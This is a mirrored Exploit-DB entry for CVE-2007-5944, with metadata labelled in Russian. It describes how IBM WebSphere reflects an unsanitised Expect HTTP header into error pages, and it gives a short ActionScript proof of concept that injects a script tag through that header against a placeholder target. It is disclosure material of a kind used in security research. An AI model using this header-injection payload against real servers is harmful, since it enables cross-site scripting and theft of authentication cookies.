- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 30768
- Проверка EDB
-
- Пройдено
- Автор
- ANONYMOUS
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-2007-5944
- Дата публикации
- 2007-11-15
Код:
source: https://www.securityfocus.com/bid/26457/info
IBM WebSphere Application Server is prone to a security weakness regarding an HTTP request header. The software fails to sanitize a certain HTTP header when the data is redirected to an error message.
An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.
var req:LoadVars=new LoadVars();
req.addRequestHeader("Expect",
"<script>alert('gotcha!')</script>");
req.send("http://www.target.site/","_blank","GET");- Источник
- www.exploit-db.com
